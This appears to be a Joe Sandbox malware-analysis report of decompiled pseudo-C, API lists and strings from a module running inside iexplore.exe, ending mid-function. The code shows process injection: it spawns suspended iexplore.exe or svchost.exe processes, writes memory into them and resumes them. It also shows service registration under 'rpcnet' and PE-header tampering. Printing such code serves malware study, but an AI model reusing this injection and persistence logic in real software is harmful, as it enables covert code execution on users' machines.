Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Virtual$AllocCloseCreateFreeHandleMemoryProcessRemoteThreadWritelstrlen
String ID:
API String ID: 4087653319-0
Opcode ID: 6b35ee75928023d1c373a9683a9845aab3ec622a5c90f6c3e7093c0e23957cee
Instruction ID: 0632e4a538d9950daad9f33b8e47e12d35339e81be77794994d5613153f95a79
Opcode Fuzzy Hash: 6b35ee75928023d1c373a9683a9845aab3ec622a5c90f6c3e7093c0e23957cee
Instruction Fuzzy Hash: 16018176140384FBE7218A66CC49F9B3FBCEF89B92F215418BA0AE6182D675D900C774

Uniqueness

Uniqueness Score: -1.00%

Function 72B22ADB, Relevance: 21.2, APIs: 14, Instructions: 185
processthreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E72B22ADB(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t67;
				void* _t70;
				intOrPtr _t84;
				intOrPtr _t93;
				void* _t117;
				void* _t119;
				struct _STARTUPINFOA _t121;
				void** _t122;
				void* _t125;

				_t119 = __edx;
				_t117 = __ecx;
				_push(0x180);
				_push(0x72b25410);
				E72B24A94(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t125 - 0x1c)) = 0;
				 *((intOrPtr*)(_t125 - 0x3c)) = 0;
				_t67 =  *0x72b26008; // 0x72b27204
				_t3 = _t67 + 0x34; // 0x72b232de
				 *((intOrPtr*)(_t125 - 0x24)) =  *_t3;
				 *(_t125 - 0x40) = 0;
				 *(_t125 - 4) = 0;
				_t70 = OpenProcess(0x1fffff, 1, GetCurrentProcessId());
				 *(_t125 - 0x38) = _t70;
				if(_t70 == 0) {
					L26:
					 *(_t125 - 4) =  *(_t125 - 4) | 0xffffffff;
					E72B22D0B(0);
					return E72B2159C( *((intOrPtr*)(_t125 - 0x1c)), _t119);
				} else {
					_t121 = 0x44;
					E72B24D2D(_t125 - 0x8c, 0, _t121);
					 *(_t125 - 0x8c) = _t121;
					 *((short*)(_t125 - 0x5c)) = 0;
					 *((intOrPtr*)(_t125 - 0x60)) = 0x181;
					 *(_t125 - 0x4c) =  *(_t125 - 0x38);
					if( *((intOrPtr*)(_t125 - 0x24)) == 0 || E72B22598(_t125 - 0x190, 0x104) == 0) {
						E72B22842(_t125 - 0x190, 1);
					}
					if( *(_t125 + 8) == 0) {
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessA(0, _t125 - 0x190, 0, 0, 1, 4, 0, 0, _t125 - 0x8c, _t125 - 0x34);
					} else {
						_t122 = _t125 + 8;
						 *(_t125 - 0x20) = 0;
						 *(_t125 - 0x44) = 0;
						if(DuplicateTokenEx( *(_t125 + 8), 0x2000000, 0, 0, 1, _t125 - 0x20) != 0) {
							SetTokenInformation( *(_t125 - 0x20), 0xc, _t125 - 0x44, 4);
							_t122 = _t125 - 0x20;
						}
						_push(0);
						_push( *_t122);
						_push(_t125 - 0x40);
						L72B2446E();
						 *((intOrPtr*)(_t125 - 0x1c)) = CreateProcessAsUserA( *_t122, 0, _t125 - 0x190, 0, 0, 1, 0x404,  *(_t125 - 0x40), 0, _t125 - 0x8c, _t125 - 0x34);
						if( *(_t125 - 0x20) != 0) {
							CloseHandle( *(_t125 - 0x20));
						}
					}
					if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
						L13:
						_t84 =  *((intOrPtr*)(_t125 - 0x1c));
						if(_t84 == 0) {
							goto L26;
						}
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							_t84 =  *0x72b260c4; // 0x72b20000
						}
						WriteProcessMemory( *(_t125 - 0x34), _t84 -  *0x72b260c4 + 0x72b260c8, 0x72b260c8, 0x80, 0);
						if( *((intOrPtr*)(_t125 - 0x24)) == 0) {
							ResumeThread( *(_t125 - 0x30));
							goto L23;
						} else {
							_t93 =  *0x72b26008; // 0x72b27204
							_t49 = _t93 + 0x34; // 0x72b232de
							E72B224BC(0x72b260c8,  *(_t125 - 0x34),  *_t49, 0, 0, _t125 - 0x1c, 0);
							if( *((intOrPtr*)(_t125 - 0x1c)) != 0) {
								L23:
								__eflags =  *0x72b26038; // 0x1
								if(__eflags != 0) {
									E72B22758( *(_t125 - 0x34));
									 *(_t125 - 0x34) = 0;
								} else {
									 *((intOrPtr*)(_t125 - 0x3c)) = CreateThread(0, 0, E72B22758,  *(_t125 - 0x34), 0, _t125 - 0x48);
								}
								goto L26;
							}
							goto L18;
						}
					} else {
						if( *((intOrPtr*)(_t125 - 0x1c)) == 0) {
							L18:
							if( *(_t125 - 0x34) != 0) {
								TerminateProcess( *(_t125 - 0x34), 0);
								CloseHandle( *(_t125 - 0x34));
							}
							if( *(_t125 - 0x30) != 0) {
								CloseHandle( *(_t125 - 0x30));
							}
							goto L26;
						}
						E72B22842(_t125 - 0x190, 0);
						 *((intOrPtr*)(_t125 - 0x1c)) = E72B227D2(_t117, _t125 - 0x190,  *(_t125 - 0x34), 0);
						goto L13;
					}
				}
			}

0x72b22adb
0x72b22adb
0x72b22adb
0x72b22ae0
0x72b22ae5
0x72b22aec
0x72b22aef
0x72b22af2
0x72b22af7
0x72b22afa
0x72b22afd
0x72b22b00
0x72b22b13
0x72b22b19
0x72b22b1e
0x72b22cf5
0x72b22cf5
0x72b22cf9
0x72b22d06
0x72b22b24
0x72b22b26
0x72b22b30
0x72b22b35
0x72b22b3d
0x72b22b41
0x72b22b4b
0x72b22b51
0x72b22b70
0x72b22b70
0x72b22b78
0x72b22c16
0x72b22b7a
0x72b22b7a
0x72b22b7d
0x72b22b80
0x72b22b9a
0x72b22ba7
0x72b22bad
0x72b22bad
0x72b22bb0
0x72b22bb1
0x72b22bb6
0x72b22bb7
0x72b22be3
0x72b22be9
0x72b22bee
0x72b22bee
0x72b22be9
0x72b22c1c
0x72b22c43
0x72b22c43
0x72b22c48
0x00000000
0x00000000
0x72b22c51
0x72b22c53
0x72b22c53
0x72b22c70
0x72b22c79
0x72b22cc2
0x00000000
0x72b22c7b
0x72b22c82
0x72b22c87
0x72b22c8d
0x72b22c95
0x72b22cc8
0x72b22cc8
0x72b22cce
0x72b22ced
0x72b22cf2
0x72b22cd0
0x72b22ce5
0x72b22ce5
0x00000000
0x72b22cce
0x00000000
0x72b22c95
0x72b22c1e
0x72b22c21
0x72b22c97
0x72b22c9a
0x72b22ca0
0x72b22ca9
0x72b22ca9
0x72b22cb2
0x72b22cb7
0x72b22cb7
0x00000000
0x72b22cb2
0x72b22c2b
0x72b22c40
0x00000000
0x72b22c40
0x72b22c1c

APIs

GetCurrentProcessId.KERNEL32(72B25410,00000180,72B232A3,00000000,00000001), ref: 72B22B03
OpenProcess.KERNEL32(001FFFFF,00000001,00000000), ref: 72B22B13
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000000,00000001,?), ref: 72B22B92
SetTokenInformation.ADVAPI32(?,0000000C,?,00000004), ref: 72B22BA7
CreateEnvironmentBlock.USERENV(?,?,00000000), ref: 72B22BB7
CreateProcessAsUserA.ADVAPI32(?,00000000,?,00000000,00000000,00000001,00000404,?,00000000,?,?,?,?,00000000), ref: 72B22BDD
CloseHandle.KERNEL32(?), ref: 72B22BEE
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000004,00000000,00000000,?,?), ref: 72B22C10
WriteProcessMemory.KERNEL32(?,?,72B260C8,00000080,00000000), ref: 72B22C70
TerminateProcess.KERNEL32(?,00000000), ref: 72B22CA0

Part of subcall function 72B22598: GetSystemDirectoryA.KERNEL32 ref: 72B225AF
Part of subcall function 72B22598: lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD

CloseHandle.KERNEL32(?), ref: 72B22CA9
CloseHandle.KERNEL32(?), ref: 72B22CB7
ResumeThread.KERNEL32(?), ref: 72B22CC2
CreateThread.KERNEL32(00000000,00000000,Function_00002758,?,00000000,?), ref: 72B22CDF

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Process$Create$CloseHandle$ThreadToken$BlockCurrentDirectoryDuplicateEnvironmentInformationMemoryOpenResumeSystemTerminateUserWritelstrcat
String ID:
API String ID: 1678882957-0
Opcode ID: 9436f0aca18cbd3cba0aed46c66ddd1149d9c476bfbe7d6ea7b0461c2af8d935
Instruction ID: f5b20b8953284a8165a29b877f7eeecf3b44c4b9faa719a56fe60fce383bd0f6
Opcode Fuzzy Hash: 9436f0aca18cbd3cba0aed46c66ddd1149d9c476bfbe7d6ea7b0461c2af8d935
Instruction Fuzzy Hash: C961F7B2812228AFDB218F95CD48EDEBBB9FF08742F10445AF60AE2111D7305A45CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B22842, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 89
stringfileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22842(long _a4, void _a8) {
				CHAR* _v8;
				char _v268;
				long _t21;
				int _t24;
				int _t25;
				struct HINSTANCE__* _t28;
				signed short _t30;
				CHAR* _t37;
				void* _t40;
				long _t44;
				CHAR* _t46;
				void* _t48;

				_t21 = GetModuleFileNameA( *0x72b260c4,  &_v268, 0x104);
				if(_t21 == 0) {
					return _t21;
				}
				_v8 = "dll";
				if(_a8 != 0) {
					_v8 = "exe";
				}
				_t46 = _a4;
				lstrcpyA(_t46,  &_v268);
				_t24 = lstrlenA(_t46);
				_t9 = _t46 - 3; // -3
				_t37 = _t24 + _t9;
				_t25 = lstrcmpiA(_t37, _v8);
				if(_t25 != 0) {
					lstrcpyA(_t37, _v8);
					_t25 = CopyFileA( &_v268, _t46, 0);
					if(_t25 != 0) {
						_t25 = CreateFileA(_t46, 0xc0000000, 3, 0, 3, 0, 0);
						_t48 = _t25;
						if(_t48 != 0xffffffff) {
							_t28 =  *0x72b260c4; // 0x72b20000
							_t12 = _t28 + 0x3c; // 0x48
							_t40 =  *_t12 + _t28;
							_t44 = _t40 - _t28 + 0x16;
							_a4 = _t44;
							if(_a8 != 0) {
								_t30 =  *(_t40 + 0x16) & 0x0000dfff;
							} else {
								_t30 = 0x00002000 |  *(_t40 + 0x16);
							}
							_a8 = _t30;
							SetFilePointer(_t48, _t44, 0, 0);
							WriteFile(_t48,  &_a8, 2,  &_a4, 0);
							_t25 = CloseHandle(_t48);
						}
					}
				}
				return _t25;
			}

0x72b2285d
0x72b22865
0x72b22942
0x72b22942
0x72b2286f
0x72b22876
0x72b22878
0x72b22878
0x72b22888
0x72b22893
0x72b22896
0x72b2289f
0x72b2289f
0x72b228a4
0x72b228ac
0x72b228b6
0x72b228c3
0x72b228cb
0x72b228da
0x72b228e0
0x72b228e5
0x72b228e7
0x72b228ec
0x72b228ef
0x72b228f5
0x72b228f8
0x72b228fe
0x72b22914
0x72b22900
0x72b22905
0x72b22905
0x72b2291b
0x72b2291f
0x72b22931
0x72b22938
0x72b22938
0x72b228e5
0x72b228cb
0x00000000

APIs

GetModuleFileNameA.KERNEL32(?,00000104), ref: 72B2285D
lstrcpyA.KERNEL32(?,?), ref: 72B22893
lstrlenA.KERNEL32(?), ref: 72B22896
lstrcmpiA.KERNEL32(-00000003,72B212DC), ref: 72B228A4
lstrcpyA.KERNEL32(-00000003,72B212DC), ref: 72B228B6
CopyFileA.KERNEL32 ref: 72B228C3
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 72B228DA
SetFilePointer.KERNEL32(00000000,00000032,00000000,00000000), ref: 72B2291F
WriteFile.KERNEL32(00000000,00000000,00000002,?,00000000), ref: 72B22931
CloseHandle.KERNEL32(00000000), ref: 72B22938

Strings

exe, xrefs: 72B22878
dll, xrefs: 72B2286F

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: File$lstrcpy$CloseCopyCreateHandleModuleNamePointerWritelstrcmpilstrlen
String ID: dll$exe
API String ID: 3010676052-2048111982
Opcode ID: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
Instruction ID: 39e45ebfadebca685611a7423d435aa536271cb13803ea72af992d0feb52d8ed
Opcode Fuzzy Hash: 41059c5f0c257f087289713e3c8953f801aa8b4b035a1268cac12f3048a25823
Instruction Fuzzy Hash: C331B636500218BBDB209F56CD48FEB3BFCEF85795F118469FA4AE7142E6308545CB60

Uniqueness

Uniqueness Score: -1.00%

Function 72B22598, Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 69
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22598(CHAR* _a4, int _a8) {
				void* _v8;
				long _v12;
				int _v16;
				void* _t18;
				char* _t32;
				CHAR* _t34;
				void* _t36;

				_t32 = 0;
				_t36 =  *0x72b26038 - _t32; // 0x1
				if(_t36 != 0) {
					_t34 = _a4;
					while(1) {
						lstrcpyA(_t34, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\iexplore.exe");
						if(_t32 != 0) {
							_t34[0x29] = 0;
						}
						if(RegOpenKeyA(0x80000002, _t34,  &_v8) != 0) {
							goto L10;
						}
						_v16 = _a8;
						RegQueryValueExA(_v8, _t32, 0,  &_v12, _t34,  &_v16);
						RegCloseKey(_v8);
						if(_t32 != 0) {
							lstrcatA(_t34, "\\Internet Explorer\\iexplore.exe");
						}
						if(GetBinaryTypeA(_t34,  &_v12) != 0 && _v12 == 0) {
							_t18 = 1;
							L14:
							return _t18;
						}
						L10:
						if(_t32 != 0) {
							_t18 = 0;
							goto L14;
						}
						_t32 = "ProgramFilesDir";
					}
				}
				GetSystemDirectoryA(_a4, _a8);
				lstrcatA(_a4, "\\svchost.exe");
				return 1;
			}

0x72b2259f
0x72b225a1
0x72b225a7
0x72b225cc
0x72b225cf
0x72b225d5
0x72b225dd
0x72b225df
0x72b225df
0x72b225f5
0x00000000
0x00000000
0x72b225fa
0x72b2260c
0x72b22615
0x72b2261d
0x72b22625
0x72b22625
0x72b22638
0x72b2264d
0x72b22652
0x00000000
0x72b22652
0x72b22640
0x72b22642
0x72b22650
0x00000000
0x72b22650
0x72b22644
0x72b22644
0x72b225cf
0x72b225af
0x72b225bd
0x00000000

APIs

GetSystemDirectoryA.KERNEL32 ref: 72B225AF
lstrcatA.KERNEL32(?,\svchost.exe), ref: 72B225BD
lstrcpyA.KERNEL32(?,Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe), ref: 72B225D5
RegOpenKeyA.ADVAPI32(80000002,?,?), ref: 72B225ED
RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?), ref: 72B2260C
RegCloseKey.ADVAPI32(?), ref: 72B22615
lstrcatA.KERNEL32(?,\Internet Explorer\iexplore.exe), ref: 72B22625
GetBinaryTypeA.KERNEL32(?,?), ref: 72B22630

Strings

\Internet Explorer\iexplore.exe, xrefs: 72B2261F
ProgramFilesDir, xrefs: 72B22644
\svchost.exe, xrefs: 72B225B5
Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe, xrefs: 72B225CF

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: lstrcat$BinaryCloseDirectoryOpenQuerySystemTypeValuelstrcpy
String ID: ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion\App Paths\iexplore.exe$\Internet Explorer\iexplore.exe$\svchost.exe
API String ID: 2611574897-1971102070
Opcode ID: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
Instruction ID: aa450610dbcd0adc5716e67513ca5fe787850a5d435588086c1ad627bace7870
Opcode Fuzzy Hash: 5c6572f8ddf3471d1757c32e47d8a8e638a347b27da69d638de365546d842f4c
Instruction Fuzzy Hash: 2C218E37560344BBDB129E69CC08BDB7BFDEF84286F214529F94AE6006E7308A51CB61

Uniqueness

Uniqueness Score: -1.00%

Function 72B2493C, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 124libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 72B2495C
GetProcAddress.KERNEL32(00000000,CryptAcquireContextW), ref: 72B2497A
GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 72B24987
GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 72B24994
FreeLibrary.KERNEL32(?), ref: 72B249D8

Strings

CryptGenRandom, xrefs: 72B2497C
CryptReleaseContext, xrefs: 72B24989
CryptAcquireContextW, xrefs: 72B24974
advapi32.dll, xrefs: 72B24957

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 2449869053-171673395
Opcode ID: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
Instruction ID: da1224439bb4948f671e8665be7783c961a7690319e1cb8d5b89657dbbdfc4a5
Opcode Fuzzy Hash: 76955d8ea82e5e10655fe380b2fa915008fff55a7b7e9bfcc91a957374e38f08
Instruction Fuzzy Hash: 97415072900209AFDF12CF55CC84BDA7FB9EF85351F1481AABE09AF145D770A645CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B22658, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 81
synchronizationregistrythreadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E72B22658(void* __ecx) {
				void* _v8;
				long _v12;
				int _t6;
				void* _t11;
				struct HWND__* _t13;
				intOrPtr _t24;

				 *0x72b260a4 = CreateEventA(0, 1, 0, 0);
				 *0x72b26010 = 0x10;
				 *0x72b2601c = 0x42a;
				 *0x72b26020 = 1;
				_t6 = RegisterServiceCtrlHandlerA("rpcnet", E72B21EEB);
				 *0x72b260bc = _t6;
				if(_t6 != 0) {
					_push(0);
					_push(0x1388);
					_t24 = 2;
					_push(_t24);
					 *0x72b26018 = 1;
					E72B22266();
					 *0x72b26018 = 5;
					E72B22266(4, 0, 0);
					E72B22296();
					 *0x72b2601c = 0;
					 *0x72b26020 = 0;
					_t11 = CreateThread(0, 0, E72B23161, 0, 0,  &_v12);
					_v8 = _t11;
					if(_t11 != 0) {
						WaitForSingleObject( *0x72b260a4, 0xffffffff);
						_t13 =  *0x72b2600c; // 0x1004c
						if(_t13 != 0) {
							PostMessageA(_t13, 0x11, 0, 0);
						}
						WaitForSingleObject(_v8, 0x7530);
						CloseHandle(_v8);
					} else {
						 *0x72b26020 = _t24;
					}
					CloseHandle( *0x72b260a4);
					_t6 = E72B22266(1, 0, 0);
				}
				return _t6;
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 72B22668
RegisterServiceCtrlHandlerA.ADVAPI32(rpcnet,72B21EEB), ref: 72B22697

Part of subcall function 72B22266: SetServiceStatus.ADVAPI32(72B26010,?,72B226C0,00000002,00001388,00000000), ref: 72B2228C

Part of subcall function 72B22296: RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
Part of subcall function 72B22296: RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
Part of subcall function 72B22296: RegEnumValueA.ADVAPI32 ref: 72B22300
Part of subcall function 72B22296: RegCloseKey.ADVAPI32(?), ref: 72B22309

CreateThread.KERNEL32(00000000,00000000,72B23161,00000000,00000000,?), ref: 72B226F1
WaitForSingleObject.KERNEL32(000000FF), ref: 72B22714
PostMessageA.USER32 ref: 72B22724
WaitForSingleObject.KERNEL32(?,00007530), ref: 72B22732
CloseHandle.KERNEL32(?), ref: 72B22737
CloseHandle.KERNEL32 ref: 72B22743

Strings

rpcnet, xrefs: 72B22673

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Close$CreateHandleObjectServiceSingleValueWait$CtrlEnumEventHandlerMessageOpenPostQueryRegisterStatusThread
String ID: rpcnet
API String ID: 2965456292-717388198
Opcode ID: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
Instruction ID: 02e831f8f98af63f743597e7f97a2177f381f5a52501a144112e9f4fabe84738
Opcode Fuzzy Hash: 6326df2ed4b094ffd8747898ea3af8264a0165ffc983375e096e12d1523c2ac5
Instruction Fuzzy Hash: 87216BB2591364BBD7315B5B8C88F9B3EE8FB497E2B22091DF209D7142C3740900EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 72B216BA, Relevance: 12.1, APIs: 8, Instructions: 53
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B216BA(struct _CRITICAL_SECTION* _a4) {
				signed char _t17;
				struct _CRITICAL_SECTION* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				struct _CRITICAL_SECTION* _t34;
				void* _t35;

				_t34 = _a4;
				_t17 =  *(_t34 + 0x1b44);
				if((_t17 & 0x00000001) != 0) {
					 *(_t34 + 0x1b44) = _t17 & 0x000000fe;
					_t19 = _t34 + 0x1b18;
					_a4 = _t19;
					EnterCriticalSection(_t19);
					_t20 =  *(_t34 + 0x1b40);
					if(_t20 != 0) {
						SetEvent(_t20);
					}
					_t21 =  *(_t34 + 0x1b10);
					if(_t21 != 0) {
						SetEvent(_t21);
					}
					_t22 =  *(_t34 + 0x1b0c);
					if(_t22 != 0) {
						WaitForSingleObject(_t22, 0x7d0);
						CloseHandle( *(_t34 + 0x1b0c));
						 *(_t34 + 0x1b0c) =  *(_t34 + 0x1b0c) & 0x00000000;
					}
					_t23 =  *(_t34 + 0x1b40);
					if(_t23 != 0) {
						_t23 = CloseHandle(_t23);
					}
					_t35 =  *(_t34 + 0x1b10);
					if(_t35 != 0) {
						_t23 = CloseHandle(_t35);
					}
					DeleteCriticalSection(_a4);
					return _t23;
				}
				return _t17;
			}

APIs

EnterCriticalSection.KERNEL32(?,00000000,00000080,?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000), ref: 72B216E3
SetEvent.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B216FA
SetEvent.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B21707
WaitForSingleObject.KERNEL32(?,000007D0,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2171F
CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2172B
CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2173F
CloseHandle.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B2174C
DeleteCriticalSection.KERNEL32(?,?,72B21E7E,?,?,?,?,72B21F52,?,00000000,?,72B23101,00000000,?), ref: 72B21751

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: CloseHandle$CriticalEventSection$DeleteEnterObjectSingleWait
String ID:
API String ID: 2299618653-0
Opcode ID: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
Instruction ID: 2178e58ac556364a2b17c8ba54c2abf152cba4207c59054d382db62ef48bba22
Opcode Fuzzy Hash: 17a48539fed4873c5e27a783ff253b1c6096266a9993aaa7f4632e88b4429619
Instruction Fuzzy Hash: 04113075610744ABCB21AE7ACD84BC7BBFCEF84795B115819E95EE3212E734E8008A64

Uniqueness

Uniqueness Score: -1.00%

Function 72B22296, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E72B22296() {
				int _v8;
				void* _v12;
				char _v44;
				long _t13;
				int _t23;

				_v8 = 0x80;
				_t13 = RegOpenKeyA(0x80000002, "System\\CurrentControlSet\\Services\\rpcnetp",  &_v12);
				if(_t13 == 0) {
					RegQueryValueExA(_v12, 0, 0, 0, 0x72b260c8,  &_v8);
					_t23 = 0x20;
					while(1) {
						_v8 = _t23;
						if(RegEnumValueA(_v12, 0,  &_v44,  &_v8, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v12,  &_v44);
					}
					return RegCloseKey(_v12);
				}
				return _t13;
			}

0x72b222aa
0x72b222b1
0x72b222b9
0x72b222cf
0x72b222dd
0x72b222ed
0x72b222fd
0x72b22304
0x00000000
0x00000000
0x72b222e7
0x72b222e7
0x00000000
0x72b22311
0x72b22313

APIs

RegOpenKeyA.ADVAPI32(80000002,System\CurrentControlSet\Services\rpcnetp,?), ref: 72B222B1
RegQueryValueExA.ADVAPI32(?,00000000,00000000,00000000,72B260C8,00000080,00000002,00000000,00000001), ref: 72B222CF
RegDeleteValueA.ADVAPI32(?,?), ref: 72B222E7
RegEnumValueA.ADVAPI32 ref: 72B22300
RegCloseKey.ADVAPI32(?), ref: 72B22309

Strings

System\CurrentControlSet\Services\rpcnetp, xrefs: 72B222A0

Memory Dump Source

Source File: 00000008.00000002.940952004.0000000072B21000.00000020.00020000.sdmp, Offset: 72B20000, based on PE: true

Associated: 00000008.00000002.940903627.0000000072B20000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.940979745.0000000072B26000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.941005619.0000000072B28000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_72b20000_iexplore.jbxd

Similarity

API ID: Value$CloseDeleteEnumOpenQuery
String ID: System\CurrentControlSet\Services\rpcnetp
API String ID: 1768883651-3077676073
Opcode ID: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
Instruction ID: a7eab7136433f130f13a6380ef9fab967bd967ebe69315b92658c948a71fe067
Opcode Fuzzy Hash: dbc8a239d347661229ba9342a2df6a68b04c2aeedf9f02f1e23618de36513fb7
Instruction Fuzzy Hash: 9E010C76901218BBDB219A96CD48EDF7FBCEF452A1F101065FA05F2002D7319A45EBB4

Uniqueness

Uniqueness Score: -1.00%

Function 72B21C7B, Relevance: 9.1, APIs: 6, Instructions: 52
memorythreadinjectionCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E72B21C7B() {
				void* _t40;
				long _t41;
				void* _t42;
				void* _t43;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t47;
				void* _t48;

				_push(0x10);
				_push(0x72b25398);
				E72B24A94(_t40, _t44, _t46);
				 *(_t48 - 0x1c) = LocalAlloc(0x40, 0x4464);
				_t45 = GetStdHandle(0xfffffff4);
				 *(_t48 - 4) =  *(_t48 - 4) & 0x00000000;
				if( *(_t48 - 0x1c) != 0) {
					_push(_t48 - 0x20);
					_t41 = 4;
					_t47 =  *(_t48 + 8);
					if(WriteProcessMemory(_t45, _t47 + 0x84, _t48 - 0x1c, _t41, ??) != 0 && ReadProcessMemory(_t45, _t47,  *(_t48 - 0x1c), 0x78, _t48 - 0x20) != 0) {
						 *( *(_t48 - 0x1c) + 0x6c) = _t41;
						 *( *(_t48 - 0x1c) + 0x70) =  *( *(_t48 - 0x1c) + 0x70) | 0xffffffff;
						 *( *(_t48 - 0x1c) + 0x370c) =  *( *(_t48 - 0x1c) + 0x370c) | _t41;
						 *( *(_t48 - 0x1c) + 0x1bd4) = _t47;
